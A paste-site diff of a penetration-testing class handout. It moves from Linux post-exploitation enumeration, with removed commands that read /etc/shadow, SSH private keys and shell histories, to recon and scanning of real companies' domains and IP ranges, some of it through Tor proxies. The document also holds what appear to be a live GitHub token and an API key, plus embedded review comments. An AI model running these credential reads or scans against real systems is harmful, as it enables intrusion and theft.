View difference between Paste ID: NUQBbF0e and UYyx2rk4
1-
##############################
1+
##################################
2-
# Linux For InfoSec Pros     # 
2+
# Scripting For InfoSec Pros     # 
3-
# By Joe McCray              #
3+
# By Joe McCray                  #
4-
##############################
4+
##################################
5
6-
Here is the download link for the video of the morning session:
6+
7-
https://s3.amazonaws.com/StrategicSec-Videos/_2015_4_18_rec-lw-us-9_233534_recording.mp4
7+
8
##########
9-
Here is the download link for the video of the afternoon session:
9+
10-
https://s3.amazonaws.com/StrategicSec-Videos/_2015_4_18_rec-lw-us-4_233632_recording.mp4
10+
11
- Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class.
12
13
14
##########################
15
# Download the attack VM #
16
##########################
17-
- For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player.
17+
https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
18
user:      infosecaddicts
19-
- A 30-day trial of Workstation 11 can be downloaded from here:
19+
pass:      infosecaddicts
20-
- https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_workstation/11_0
20+
21
22-
- A 30-day trial of Fusion 7 can be downloaded from here:
22+
23-
- https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_fusion/7_0
23+
24
25-
- The newest version of VMWare Player can be downloaded from here:
25+
26-
- https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_player/7_0
26+
27
########################################
28
# Boot up the StrategicSec Ubuntu host #
29
# You can also boot up the Win7 as well# 
30
########################################
31
32
- Log in to your Ubuntu host with the following credentials:
33
	user: strategicsec
34
	pass: strategicsec
35-
https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu14.zip
35+
36-
user: strategicsec
36+
37-
pass: strategicsec
37+
38
- I prefer to use Putty to SSH into my Ubuntu host on pentests and I'll be teaching this class in the same manner that I do pentests.
39
- You can download Putty from here:
40
- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
41
42
43
- For the purpose of this workshop 192.168.230.128 is my Ubuntu IP address so anytime you see that IP you'll know that's my Ubuntu host
44
45
46
Email Harvesting
47
----------------
48
 
49
cd ~/toolz/
50
 
51
rm -rf theharvester-read-only/
52
 
53
sudo apt install -y python-pyasn1 python-pyasn1-modules git vim nmap openssh-server proxychains git-core curl zlib1g-dev build-essential libssl-dev libreadline-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev libcurl4-openssl-dev python-software-properties libffi-dev
54
     strategicsec
55
56
pip install requests
57
 
58
git clone https://github.com/laramies/theHarvester.git
59
 
60
cd theHarvester/
61
 
62
python theHarvester.py
63
 
64
python theHarvester.py -d motorola.com -l 50 -b google
65-
# Basic Linux Commands #
65+
66
python theHarvester.py -d motorola.com -l 50 -b bing
67
 
68-
pwd
68+
python theHarvester.py -d motorola.com -l 50 -b linkedin
69
 
70-
whereis pwd
70+
python theHarvester.py -d motorola.com -l 50 -b pgp
71
 
72-
which pwd
72+
73
 
74-
sudo find / -name pwd
74+
75
 
76-
/bin/pwd
76+
File Meta-Data Harvesting
77
-------------------------
78-
mkdir test
78+
79
 
80-
cd test
80+
sudo apt-get install -y python-pip
81
     strategicsec
82-
touch one two three
82+
83
pip install --upgrade pip
84-
ls -l t		(without pressing the Enter key, press the Tab key twice. What happens?)
84+
85
pip install google
86-
h		(and again without pressing the Enter key, press the Tab key twice. What happens?)
86+
87
 
88-
Press the 'Up arrow key'	(What happens?)
88+
git clone https://github.com/opsdisk/metagoofil.git
89
 
90-
Press 'Ctrl-A'			(What happens?)
90+
cd metagoofil/
91
 
92
 
93
python metagoofil.py -d motorola.com -t doc,pdf -l 100 -n 3 -o motorolafiles
94-
clear				(What happens?)
94+
95
sudo apt install libimage-exiftool-perl
96-
echo one > one
96+
97
 
98-
cat one				(What happens?)
98+
cd motorolafiles
99
100-
man cat				(What happens?)
100+
exiftool -r *.doc | egrep -i "Author|Creator|Email|Producer|Template" | sort -u
101-
	q
101+
102
 
103-
cat two
103+
104
python metagoofil.py -d [domain name] -t doc,pdf -l 100 -n 3 -o motorolafiles
105-
cat one > two
105+
Whereas:
106
 
107-
cat two
107+
-d : I used another domain name aside from Google.com to make it work
108
-t : I asked for the program to search two types of public documents whuch are doc and pdf files
109-
cat one two > three
109+
-l : I limited the search result to 100 to make the process faster
110
-n : I limited the downloads (files that are going to be downloaded to get their metadatas extracted) to only 3 to make the process faster
111-
cat three
111+
-o : I directed the result of the compilation t motorolafiles, which is a file located inside the metagoofil directory (~/toolz/metagoofil/motorolafiles)
112
-f : Save the html links to html_links_<TIMESTAMP>.txt file
113-
echo four >> three
113+
114
 
115-
cat three 			(What happens?)
115+
116
 
117-
wc -l three
117+
118
 
119-
man wc
119+
Github Info Harvesting
120-
	q
120+
----------------------
121
cd ~/toolz/
122-
cat three | grep four
122+
123
sudo pip install gitem
124-
cat three | grep one
124+
125
126-
man grep
126+
127-
	q
127+
gitem organization facebook
128
 
129
 
130-
sudo grep eth[01] /etc/*	(What happens?)
130+
gitem repository facebook react
131
 
132-
cat /etc/iftab
132+
133
gitem --processes 4 user zpao
134
135-
man ps
135+
You'll probably get a message that says "Your API requests are being rate-limited"
136-
	q
136+
137
138-
ps
138+
You can create an Oauth token using the link below:
139
Reference:
140-
ps aux
140+
https://help.github.com/articles/creating-an-access-token-for-command-line-use/
141
142-
ps aux | less
142+
143
gitem -o 123f45672972c18ea0f42fc70bc8c5172b96d890 --processes 4 user zpao
144-
Press the 'Up arrow key'	(What happens?)
144+
You'll have to use your own Oauth token
145
 
146-
Press the 'Down arrow key'	(What happens?)
146+
147-
	q
147+
148
 
149-
top
149+
Network Topology Enumeration
150
----------------------------
151
 
152-
#########################################################################
152+
153-
# What kind of Linux am I on and how can I find out? 			#
153+
154-
# Great reference: 							#
154+
wget https://raw.githubusercontent.com/leonteale/pentestpackage/master/gxfr.py
155-
# https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ 	#
155+
156-
#########################################################################
156+
python gxfr.py --bxfr --dns-lookup -o
157-
What’s the distribution type? What version?
157+
    motorola.com
158-
-------------------------------------------
158+
    [ press enter ]
159-
cat /etc/issue
159+
    cw1kxyUgMdkECBNMb1fGqKJ9sC1lznaR20fPJeIt45Y=
160-
cat /etc/*-release
160+
161-
cat /etc/lsb-release      		# Debian based
161+
162-
cat /etc/redhat-release   		# Redhat based
162+
163
 
164
cd ~/toolz/
165
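Review bot: two lines in this stretch carry what look like live credentials and should be placeholders instead. The `gitem -o … --processes 4 user zpao` command embeds a 40-hex-character value, the shape of a GitHub personal access token, immediately before the text says "You'll have to use your own Oauth token", and the base64-looking string typed at the gxfr prompt (after `motorola.com` and `[ press enter ]`) is evidently the API key that `--bxfr` asks for. Anything published in a paste diff like this one has to be treated as disclosed, so revoke both and write `<YOUR_TOKEN>` and `<YOUR_API_KEY>` in the handout.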
166-
What’s the kernel version? Is it 64-bit?
166+
wget https://dl.packetstormsecurity.net/UNIX/scanners/blindcrawl.pl
167-
-------------------------------------------
167+
168-
cat /proc/version
168+
169-
uname -a
169+
170-
uname -mrs
170+
171-
rpm -q kernel
171+
172-
dmesg | grep Linux
172+
173-
ls /boot | grep vmlinuz-
173+
174
rm -rf fierce2/
175
 
176
git clone https://github.com/mschwager/fierce.git
177-
What can be learnt from the environmental variables?
177+
178-
----------------------------------------------------
178+
cd fierce
179-
cat /etc/profile
179+
180-
cat /etc/bashrc
180+
sudo apt-get install -y python3-pip
181-
cat ~/.bash_profile
181+
    strategicsec
182-
cat ~/.bashrc
182+
183-
cat ~/.bash_logout
183+
sudo pip3 install -r requirements.txt
184-
env
184+
185-
set
185+
python3 fierce.py -h
186
 
187
python3 fierce.py --domain motorola.com --subdomains accounts admin ads
188-
What services are running? Which service has which user privilege?
188+
Traverse IPs near discovered domains to search for contiguous blocks with the --traverse flag:
189-
------------------------------------------------------------------
189+
190-
ps aux
190+
python3 fierce.py --domain facebook.com --subdomains admin --traverse 10
191-
ps -ef
191+
192-
top
192+
193-
cat /etc/services
193+
Limit nearby IP traversal to certain domains with the --search flag:
194
 
195
python3 fierce.py --domain facebook.com --subdomains admin --search fb.com fb.net
196-
Which service(s) are been running by root? Of these services, which are vulnerable - it’s worth a double check!
196+
197-
---------------------------------------------------------------------------------------------------------------
197+
198-
ps aux | grep root
198+
Attempt an HTTP connection on domains discovered with the --connect flag:
199-
ps -ef | grep root
199+
200
python3 fierce.py --domain stackoverflow.com --subdomains mail --connect
201
 
202
 
203-
What applications are installed? What version are they? Are they currently running?
203+
204-
------------------------------------------------------------------------------------
204+
205-
ls -alh /usr/bin/
205+
206-
ls -alh /sbin/
206+
Another good way to find servers
207-
dpkg -l
207+
--------------------------------
208-
dpkg --get-selections | grep -v deinstall
208+
209-
rpm -qa
209+
210-
ls -alh /var/cache/apt/archives
210+
wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c
211-
ls -alh /var/cache/yum/
211+
212
gcc ipcrawl.c -o ipcrawl
213
 
214-
Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
214+
chmod 777 ipcrawl
215-
------------------------------------------------------------------------------------
215+
216-
cat /etc/syslog.conf
216+
./ipcrawl 148.87.1.1 148.87.1.254               (DNS forward lookup against an IP range)
217-
cat /etc/chttp.conf
217+
218-
cat /etc/lighttpd.conf
218+
219-
cat /etc/cups/cupsd.conf
219+
220-
cat /etc/inetd.conf
220+
221-
cat /etc/apache2/apache2.conf
221+
Check for Load Balancers
222-
cat /etc/my.conf
222+
223-
cat /etc/httpd/conf/httpd.conf
223+
Here are some command-line options to use for identifying load balancers:
224-
cat /opt/lampp/etc/httpd.conf
224+
225-
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
225+
dig microsoft.com
226
 
227
cd ~/toolz
228
wget https://raw.githubusercontent.com/craig/ge.mine.nu/master/lbd/lbd.sh
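Review bot: `chmod 777 ipcrawl` makes the just-compiled binary world-writable, so any other local user could replace it before `./ipcrawl` runs; execute permission is all it needs, and `chmod +x ipcrawl` (the form the removed line used, and the one this paste uses for lbd.sh a few lines down) is the right call. In the same hunk, `wget --no-check-certificate` switches off TLS certificate validation while fetching source code that is compiled and executed next; raw.githubusercontent.com presents a valid certificate, so drop the flag and let a certificate error stop the download rather than silently accepting a tampered file.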
229-
What jobs are scheduled?
229+
chmod +x lbd.sh
230
./lbd.sh microsoft.com
231-
crontab -l
231+
232-
ls -alh /var/spool/cron
232+
233-
ls -al /etc/ | grep cron
233+
git clone https://github.com/jmbr/halberd.git
234-
ls -al /etc/cron*
234+
cd halberd
235-
cat /etc/cron*
235+
236-
cat /etc/at.allow
236+
237-
cat /etc/at.deny
237+
238-
cat /etc/cron.allow
238+
239-
cat /etc/cron.deny
239+
240-
cat /etc/crontab
240+
241-
cat /etc/anacrontab
241+
242-
cat /var/spool/cron/crontabs/root
242+
243
Test for Web Application Firewalls (WAFs)
244
-----------------------------------------
245-
Any plain text usernames and/or passwords?
245+
pip install wafw00f
246-
------------------------------------------
246+
247-
grep -i user [filename]
247+
wafw00f http://strategicsec.com
248-
grep -i pass [filename]
248+
249-
grep -C 5 "password" [filename]
249+
wafw00f http://oracle.com
250-
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   		# Search for Joomla passwords
250+
251
252
sudo nmap -p 80 --script http-waf-detect.nse strategicsec.com
253-
What NIC(s) does the system have? Is it connected to another network?
253+
254-
---------------------------------------------------------------------
254+
255-
/sbin/ifconfig -a
255+
256-
cat /etc/network/interfaces
256+
257-
cat /etc/sysconfig/network
257+
258
259
 
260-
What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
260+
261-
------------------------------------------------------------------------------------------------------------------------
261+
262-
cat /etc/resolv.conf
262+
263-
cat /etc/sysconfig/network
263+
264-
cat /etc/networks
264+
Recon-NG (Metasploit for Recon):
265-
iptables -L
265+
--------------------------------
266-
hostname
266+
267-
dnsdomainname
267+
268
sudo apt-get install -y git python-pip python-dnspython python-mechanize python-slowaes python-xlsxwriter python-jsonrpclib python-lxml
269-
What other users & hosts are communicating with the system?
269+
    strategicsec
270-
-----------------------------------------------------------
270+
271-
lsof -i
271+
sudo pip install dicttoxml
272-
lsof -i :80
272+
    strategicsec
273-
grep 80 /etc/services
273+
274-
netstat -antup
274+
275-
netstat -antpx
275+
276-
netstat -tulpn
276+
git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
277-
chkconfig --list
277+
cd recon-ng
278-
chkconfig --list | grep 3:on
278+
pip install PyPDF2
279-
last
279+
sudo pip install olefile
280-
w
280+
    strategicsec
281
./recon-ng
282
 
283
 
284-
Whats cached? IP and/or MAC addresses
284+
285
At the prompt, let's type help in order to look at the commands we can use in Recon-ng.
286-
arp -e
286+
287-
route
287+
recon-ng > help
288-
/sbin/route -nee
288+
289
 
290
Note that many of these commands are nearly identical to Metasploit including back, set, use, search, show, and unset.
291-
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
291+
292-
------------------------------------------------------------------------------------------
292+
recon-ng > [ TAB ] [ TAB ]
293-
id
293+
294-
who
294+
295-
w
295+
296-
last
296+
To see all the modules in Recon-ng, we can type:
297-
cat /etc/passwd | cut -d:    # List of users
297+
298-
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
298+
recon-ng > show [ TAB ] [ TAB ]
299-
awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
299+
300-
cat /etc/sudoers
300+
301-
sudo -l
301+
302
Ok, let's drive this thing....
303
 
304
recon-ng > show banner
305-
What sensitive files can be found?
305+
306-
----------------------------------
306+
recon-ng > show companies
307-
cat /etc/passwd
307+
308-
cat /etc/group
308+
recon-ng > show contacts
309-
cat /etc/shadow
309+
310-
ls -alh /var/mail/
310+
recon-ng > show credentials
311
 
312
recon-ng > show dashboard
313
 
314-
Anything “interesting” in the home directorie(s)? If it’s possible to access
314+
recon-ng > show domains
315-
----------------------------------------------------------------------------
315+
316-
ls -ahlR /root/
316+
recon-ng > show hosts
317-
ls -ahlR /home/
317+
318
recon-ng > show keys
319
 
320-
Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
320+
recon-ng > show leaks
321-
---------------------------------------------------------------------------------------------------------------------------
321+
322-
cat /var/apache2/config.inc
322+
recon-ng > show locations
323-
cat /var/lib/mysql/mysql/user.MYD
323+
324-
cat /root/anaconda-ks.cfg
324+
recon-ng > show modules
325
 
326
recon-ng > show netblocks
327-
What has the user being doing? Is there any password in plain text? What have they been edting?
327+
328-
-----------------------------------------------------------------------------------------------
328+
recon-ng > show options
329-
cat ~/.bash_history
329+
330-
cat ~/.nano_history
330+
recon-ng > show ports
331-
cat ~/.atftp_history
331+
332-
cat ~/.mysql_history
332+
recon-ng > show profiles
333-
cat ~/.php_history
333+
334
recon-ng > show pushpins
335
 
336
recon-ng > show repositories
337-
What user information can be found?
337+
338
recon-ng > show schema
339-
cat ~/.bashrc
339+
340-
cat ~/.profile
340+
recon-ng > show vulnerabilities
341-
cat /var/mail/root
341+
342-
cat /var/spool/mail/root
342+
recon-ng > show workspaces
343
 
344
 
345-
Can private-key information be found?
345+
346
 
347-
cat ~/.ssh/authorized_keys
347+
348-
cat ~/.ssh/identity.pub
348+
When you have found a module that you would like to try the process is fairly straight forward.
349-
cat ~/.ssh/identity
349+
350-
cat ~/.ssh/id_rsa.pub
350+
Type, “use [Modulename]” to use the module
351-
cat ~/.ssh/id_rsa
351+
352-
cat ~/.ssh/id_dsa.pub
352+
Type, “show info” to view information about the module
353-
cat ~/.ssh/id_dsa
353+
354-
cat /etc/ssh/ssh_config
354+
And then, “show options” to see what variables can be set
355-
cat /etc/ssh/sshd_config
355+
356-
cat /etc/ssh/ssh_host_dsa_key.pub
356+
Set the option variables with “set [variable]”
357-
cat /etc/ssh/ssh_host_dsa_key
357+
358-
cat /etc/ssh/ssh_host_rsa_key.pub
358+
Finally, type “run” to execute the module
359-
cat /etc/ssh/ssh_host_rsa_key
359+
360-
cat /etc/ssh/ssh_host_key.pub
360+
361-
cat /etc/ssh/ssh_host_key
361+
********************************** Begin Day 1 Homework Part 1 **********************************
362
NOTE: Take screenshots of your performing all of the commands we've learned so far
363
364-
Any settings/files (hidden) on website? Any settings file with database information?
364+
365-
------------------------------------------------------------------------------------
365+
You must create a MS WORD document titled 'FirstName-LastName-Scripting-For-InfoSec-Day1-Basic-Linux-Pentest-Commands.docx' (ex: Joseph-McCray-Scripting-For-InfoSec-Day1-Basic-Linux-Pentest-Commands.docx).
366-
ls -alhR /var/www/
366+
367-
ls -alhR /srv/www/htdocs/
367+
You must spell you name EXACTLY as you want it spelled on your class certificate.
368-
ls -alhR /usr/local/www/apache22/data/
368+
369-
ls -alhR /opt/lampp/htdocs/
369+
IMPORTANT NOTE:
370-
ls -alhR /var/www/html/
370+
Your homework must be submitted via email to both (joe@strategicsec.com and gayane@strategicsec.com) by Sunday January 29th at midnight EST.
371
372
373-
Is there anything in the log file(s) (Could help with “Local File Includes”!)
373+
********************************** End Day 1 Homework Part 1 **********************************
374-
-----------------------------------------------------------------------------
374+
375-
cat /etc/httpd/logs/access_log
375+
376-
cat /etc/httpd/logs/access.log
376+
377-
cat /etc/httpd/logs/error_log
377+
********************************** Begin Day 1 Homework Part 2 **********************************
378-
cat /etc/httpd/logs/error.log
378+
NOTE: THIS IS AN ABSOLUTE REQUIREMENT FOR YOUR CPE CREDITS
379-
cat /var/log/apache2/access_log
379+
380-
cat /var/log/apache2/access.log
380+
381-
cat /var/log/apache2/error_log
381+
You must take screenshots of the process of you registering at least 5 API keys, as well as screenshots of you using at least 10 Recon-NG modules against a target company.
382-
cat /var/log/apache2/error.log
382+
383-
cat /var/log/apache/access_log
383+
384-
cat /var/log/apache/access.log
384+
You must create a MS WORD document titled 'FirstName-LastName-Scripting-For-InfoSec-Day1-Recon-NG.docx' (ex: Joseph-McCray--Scripting-For-InfoSec-Day1-Recon-NG.docx).
385-
cat /var/log/auth.log
385+
386-
cat /var/log/chttp.log
386+
You must spell you name EXACTLY as you want it spelled on your class certificate.
387-
cat /var/log/cups/error_log
387+
388-
cat /var/log/dpkg.log
388+
389-
cat /var/log/faillog
389+
Reference links:
390-
cat /var/log/httpd/access_log
390+
http://null-byte.wonderhowto.com/how-to/hack-like-pro-reconnaissance-with-recon-ng-part-1-getting-started-0169854/
391-
cat /var/log/httpd/access.log
391+
http://resources.infosecinstitute.com/basic-updated-guide-to-recon-ng-plus-new-modules-rundown/
392-
cat /var/log/httpd/error_log
392+
393-
cat /var/log/httpd/error.log
393+
IMPORTANT NOTE:
394-
cat /var/log/lastlog
394+
Your homework must be submitted via email to both (joe@strategicsec.com and gayane@strategicsec.com) by Sunday January 29th at midnight EST
395-
cat /var/log/lighttpd/access.log
395+
396-
cat /var/log/lighttpd/error.log
396+
********************************** End Day 1 Homework Part 2 **********************************
397-
cat /var/log/lighttpd/lighttpd.access.log
397+
398-
cat /var/log/lighttpd/lighttpd.error.log
398+
399-
cat /var/log/messages
399+
400-
cat /var/log/secure
400+
401-
cat /var/log/syslog
401+
402-
cat /var/log/wtmp
402+
# Scanning Methodology #
403-
cat /var/log/xferlog
403+
404-
cat /var/log/yum.log
404+
405-
cat /var/run/utmp
405+
- Ping Sweep
406-
cat /var/webmin/miniserv.log
406+
What's alive?
407-
cat /var/www/logs/access_log
407+
------------
408-
cat /var/www/logs/access.log
408+
sudo nmap -sP 157.166.226.*
409-
ls -alh /var/lib/dhcp3/
409+
410-
ls -alh /var/log/postgresql/
410+
411-
ls -alh /var/log/proftpd/
411+
    -if -SP yields no results try:
412-
ls -alh /var/log/samba/
412+
sudo nmap -sL 157.166.226.*
413
     strategicsec
414-
Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp
414+
415
- Port Scan
416
What's where?
417-
###########################
417+
------------
418-
# Target IP Determination #
418+
sudo nmap -sS 162.243.126.247
419-
###########################
419+
420-
- This portion starts the actual workshop content
420+
421-
- Zone Transfer fails on most domains, but here is an example of one that works:
421+
422-
dig axfr heartinternet.co.uk  @ns.heartinternet.co.uk
422+
- Bannergrab/Version Query
423
What versions of software are running
424
-------------------------------------
425-
- Usually you will need to do a DNS brute-force with something like blindcrawl or fierce
425+
sudo nmap -sV 162.243.126.247
426
     strategicsec
427-
	Look up the IP addresses at: 
427+
428-
	http://www.networksolutions.com/whois/index.jsp
428+
429
- Vulnerability Research
430
Lookup the banner versions for public exploits
431-
- Note: If you are on a different machine and need to download blindcrawl can you download it this way:
431+
----------------------------------------------
432-
wget dl.packetstormsecurity.net/UNIX/scanners/blindcrawl.pl
432+
http://exploit-db.com
433
http://securityfocus.com/bid
434
https://packetstormsecurity.com/files/tags/exploit/
435
 
436
 
437-
cd ~/toolz/fierce2
437+
438-
sudo apt-get install -y cpanminus cpan-listchanges cpanoutdated libappconfig-perl libyaml-appconfig-perl libnetaddr-ip-perl libnet-cidr-perl vim subversion
438+
#######################################################
439-
	strategicsec
439+
# Day 1: 3rd Party Scanning, and scanning via proxies #
440
#######################################################
441
 
442-
- Note: Only run this 'svn co' command below if you are NOT on the strategicsec VM:
442+
https://www.shodan.io/
443-
svn co https://svn.assembla.com/svn/fierce/fierce2/trunk/ fierce2/
443+
444
    Create a FREE account and login
445
 
446-
cd ~/toolz/fierce2
446+
    net:129.188.8.0/24
447-
wget http://search.cpan.org/CPAN/authors/id/A/AB/ABW/Template-Toolkit-2.14.tar.gz
447+
448-
tar -zxvf Template-Toolkit-2.14.tar.gz
448+
449-
cd Template-Toolkit-2.14/
449+
450-
perl Makefile.PL
450+
cd /home/strategicsec/toolz/
451-
	y
451+
perl proxyfinder-0.3.pl multiproxy 3 proxies.txt    <-- This takes a long time to run
452-
	y
452+
453-
	n
453+
454-
	y
454+
455
sudo vi /etc/proxychains.conf               <--- Make sure that last line of the file is: socks4  127.0.0.1 9050
456
     strategicsec
457
 
458
 
459
 
460-
sudo bash install.sh
460+
461
----------------------------------------------------------------------
462
vi ~/toolz/fix-proxychains-dns.sh
463-
./fierce
463+
464
#!/bin/bash
465-
./fierce -dns motorola.com
465+
# This script is called by proxychains to resolve DNS names
466
# DNS server used to resolve names
467
# Reference: http://carnal0wnage.attackresearch.com/2013/09/changing-proxychains-hardcoded-dns.html
468
DNS_SERVER=4.2.2.2
469-
- Note: Only run these 'wget, gcc, chmod' commands below if you are NOT on the strategicsec VM:
469+
470-
wget https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c
470+
if [ $# = 0 ] ; then
471-
gcc -o ipcrawl ipcrawl.c
471+
echo " usage:"
472-
chmod +x ipcrawl
472+
echo " proxyresolv <hostname> "
473
exit
474
fi
475
 
476-
- Here we do a forward lookup against an entire IP range. Basically take every IP in the range and see what it's hostname is
476+
export LD_PRELOAD=libproxychains.so.3
477
dig $1 @$DNS_SERVER +tcp | awk '/A.+[0-9]+\.[0-9]+\.[0-9]/{print $5;}'
478-
./ipcrawl 148.87.1.1 148.87.1.254				(DNS forward lookup against an IP range)
478+
-----------------------------------------------------------------------
479
 
480
 
481-
sudo nmap -sL 148.87.1.0-255
481+
sudo ntpdate pool.ntp.org
482
     strategicsec
483
 
484-
sudo nmap -sL 148.87.1.0-255 | grep oracle
484+
tor-resolve strategicsec.com
485
 
486
proxychains nmap -sT -p80 162.243.126.247
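Review bot: in the `fix-proxychains-dns.sh` script above, the usage message says `proxyresolv <hostname>` but the file is saved as `~/toolz/fix-proxychains-dns.sh`, and the usage branch ends in a bare `exit`, which returns 0 on a usage error; use `exit 1` and put the real script name in the message. `$1` should also be quoted, i.e. `dig "$1" @"$DNS_SERVER" +tcp`. The `+tcp` flag is what makes the lookup work at all here: proxychains only wraps TCP connects, so a plain UDP `dig` would leave the host unproxied.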
487-
- Reference: http://blog.depthsecurity.com/2012/01/obtaining-hostdomain-names-through-ssl.html
487+
488-
sudo nmap -p 443,444,8443,8080,8088 --script=ssl-cert --open 144.189.100.1-254
488+
proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,445,1433,1521,3306,3389,8080,10000 162.243.126.247
489
 
490-
	
490+
491
 
492
 
493
 
494-
###########################
494+
495-
# Load Balancer Detection #
495+
496-
###########################
496+
497
# Playing with Nmap NSE #
498-
- Here are some options to use for identifying load balancers:
498+
499-
	- http://toolbar.netcraft.com/site_report/
499+
500-
	- Firefox LiveHTTP Headers
500+
nmap -Pn -p80 --script ip-geolocation-* strategicsec.com
501
 
502
nmap -p80 --script dns-brute strategicsec.com
503-
- Here are some command-line options to use for identifying load balancers:
503+
504
nmap --script http-robtex-reverse-ip secore.info
505-
dig google.com
505+
506
nmap -Pn -p80 --script=http-headers strategicsec.com
507
 
508-
./lbd-0.1.sh google.com
508+
509
ls /usr/share/nmap/scripts | grep http
510
nmap -Pn -p80 --script=http-* strategicsec.com
511
512
513
514
#########################
515
# Playing with Nmap NSE #
516
#########################
517
518
nmap -Pn -p80 --script ip-geolocation-* strategicsec.com 
519
520-
# Web Application Firewall Detection #
520+
521
522
nmap --script http-robtex-reverse-ip secore.info
523-
cd ~/toolz/wafw00f
523+
524-
python wafw00f.py http://www.oracle.com
524+
525-
python wafw00f.py http://www.strategicsec.com
525+
526
527
ls /usr/share/nmap/scripts | grep http
528
nmap -Pn -p80 --script=http-* strategicsec.com
529
530
############
531
# Nmap NSE #
532-
sudo nmap -p 80 --script http-waf-detect.nse healthcare.gov
532+
533
534
- Reference for this tutorial is:
535
https://thesprawl.org/research/writing-nse-scripts-for-vulnerability-scanning/
536
537
----------------------------------------------------------------------
538
sudo vi /usr/share/nmap/scripts/intro-nse.nse
539
     strategicsec
540
541
542
543
-- The Head Section --
544
-- The Rule Section --
545
portrule = function(host, port)
546
    return port.protocol == "tcp"
547
            and port.number == 80
548
            and port.state == "open"
549
end
550
551
-- The Action Section --
552
action = function(host, port)
553
    return "I love Linux!"
554
end
555
----------------------------------------------------------------------
556
557
- Ok, now that we've made that change let's run the script
558
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse strategicsec.com -p 22,80,443
559
560
561
562
563
564
565
----------------------------------------------------------------------
566
sudo vi /usr/share/nmap/scripts/intro-nse.nse
567
568
-- The Head Section --
569
local shortport = require "shortport"
570
571
-- The Rule Section --
572
portrule = shortport.http
573
574
575
-- The Action Section --
576
action = function(host, port)
577
    return "I still love Linux!"
578
end
579
----------------------------------------------------------------------
580
581
- Ok, now that we've made that change let's run the script
582
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse strategicsec.com -p 22,80,443
583
584
585
586
587
588
589
590
OK, now let's have some fun with my buddy Carlos Perez's website which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working.
591
 
592
----------------------------------------------------------------------
593
sudo vi /usr/share/nmap/scripts/intro-nse.nse
594
 
595
-- The Head Section --
596
local shortport = require "shortport"
597
local http = require "http"
598
 
599
-- The Rule Section --
600
portrule = shortport.http
601
 
602
-- The Action Section --
603
action = function(host, port)
604
 
605
    local uri = "/installing-metasploit-in-ubunt/"
606
    local response = http.get(host, port, uri)
607
    return response.status
608
 
609
end
610
----------------------------------------------------------------------
611
 
612
- Ok, now that we've made that change let's run the script
613
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
614
 
615
 
616
 
617
 
618
----------------------------------------------------------------------
619
sudo vi /usr/share/nmap/scripts/intro-nse.nse
620
 
621
-- The Head Section --
622
local shortport = require "shortport"
623
local http = require "http"
624
 
625
-- The Rule Section --
626
portrule = shortport.http
627
 
628
-- The Action Section --
629
action = function(host, port)
630
 
631
    local uri = "/installing-metasploit-in-ubunt/"
632
    local response = http.get(host, port, uri)
633
 
634
    if ( response.status == 200 ) then
635
        return response.body
636
    end
637
 
638
end
639
----------------------------------------------------------------------
640
 
641
- Ok, now that we've made that change let's run the script
642
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
643
 
644
 
645
 
646
 
647
 
648
 
649
 
650
 
651
 
652
----------------------------------------------------------------------
653
sudo vi /usr/share/nmap/scripts/intro-nse.nse
654
 
655
-- The Head Section --
656
local shortport = require "shortport"
657
local http = require "http"
658
local string = require "string"
659
 
660
-- The Rule Section --
661
portrule = shortport.http
662
 
663
-- The Action Section --
664
action = function(host, port)
665
 
666
    local uri = "/installing-metasploit-in-ubunt/"
667
    local response = http.get(host, port, uri)
668
 
669
    if ( response.status == 200 ) then
670
        local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
671
        return title
672
    end
673
 
674
end
675
----------------------------------------------------------------------
676
 
677
- Ok, now that we've made that change let's run the script
678
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
679
 
680
 
681
 
682
 
683
 
684
 
685
 
686
----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
local shortport = require "shortport"
local http = require "http"
local string = require "string"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
action = function(host, port)

    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)

    if ( response.status == 200 ) then
        local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")

        if (title) then
            return "Vulnerable"
        else
            return "Not Vulnerable"
        end
    end
end

----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443


####################
# Installing Scapy #
####################

sudo apt-get update
sudo apt-get install python-scapy python-pyx python-gnuplot python-pycryptopp python-pycryptopp-dbg python-crypto python-crypto-dbg python-cryptography


- Reference Page For All Of The Commands We Will Be Running:
